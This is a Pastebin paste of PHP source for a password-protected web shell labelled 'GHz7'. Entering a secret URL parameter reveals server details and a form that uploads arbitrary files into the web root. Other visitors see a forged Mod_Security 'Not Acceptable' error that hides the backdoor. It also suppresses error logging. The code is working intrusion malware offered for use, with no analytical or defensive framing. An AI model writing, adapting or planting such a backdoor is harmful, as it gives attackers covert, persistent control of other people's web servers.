Advertisement
Guest User

ufuefeosasxnsjahah

a guest
Feb 17th, 2020
173
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.21 KB | None | 0 0
  1. <?php
  2. session_start();
  3. @error_reporting(0);
  4. @set_time_limit(0);
  5. @clearstatcache();
  6. @ini_set('error_log',NULL);
  7. @ini_set('log_errors',0);
  8. @ini_set('max_execution_time',0);
  9. @ini_set('output_buffering',0);
  10. @ini_set('display_errors',0);
  11. $password = "ccd4ef469fef46735af58a97907f7f3b";
  12. if(isset($_GET['lo']) && (md5($_GET['lo']) == $password)){
  13. echo "<html><head><link rel='icon' type='image/png' href='https://www.redditstatic.com/icon.png' type='image/x-icon'><meta name='theme-color' content=' #000000'><title>GHz7</title></head>";
  14. echo "<body><style type='text/css'>
  15. body{background:url('http://www.baliforyou.com/assets/psycho.jpg');background-repeat:no-repeat;overflow:hidden;background-attachment: fixed;background-position:top center;font-family:Ubuntu;color:#fff;display:flex;align-items:center;justify-content:center;background-color:#000;}</style>";
  16. echo "<center>".php_uname()."<br>&nbsp;<br>DIRNAME: ".dirname(__FILE__)."<br>&nbsp;<form method='post' enctype='multipart/form-data'><input type='file' name='lamer_file'><input type='submit' name='ghz7' value='>///<'></form></center></body></html>";
  17. $root = $_SERVER['DOCUMENT_ROOT'];$files = $_FILES['lamer_file']['name'];$dest = $root.'/'.$files;if(isset($_POST['ghz7'])){if(is_writable($root)){
  18. if(@copy($_FILES['lamer_file']['tmp_name'],$dest)){
  19. $web = "http://".$_SERVER['HTTP_HOST']."/";
  20. echo "
  21.             <script type='text/javascript'>
  22.             alert('succsessful uploaded file in $web$files');window.open('$web$files','_blank');window.open('https://instagram.com/zxmbxe_','_blank');</script>
  23.             ";}else{echo "
  24.             <script type='text/javascript'>
  25.             alert('upload failed in document root.');</script>
  26.             ";}}else{if(@copy($_FILES['lamer_file']['tmp_name'],$files)){echo "
  27.             <script type='text/javascript'>
  28.             alert('succsessful uploaded $files in this folder!.');</script>
  29.             ";}else{echo "
  30.             <script type='text/javascript'>
  31.             alert('failed to upload file.');window.open('https://easybanget.tech','_blank');</script>
  32.             ";}};}
  33. }else{echo '
  34. <head><title>Not Acceptable!</title></head><body><h1>Not Acceptable!</h1><p>An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.</p></body></html>';}
  35. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement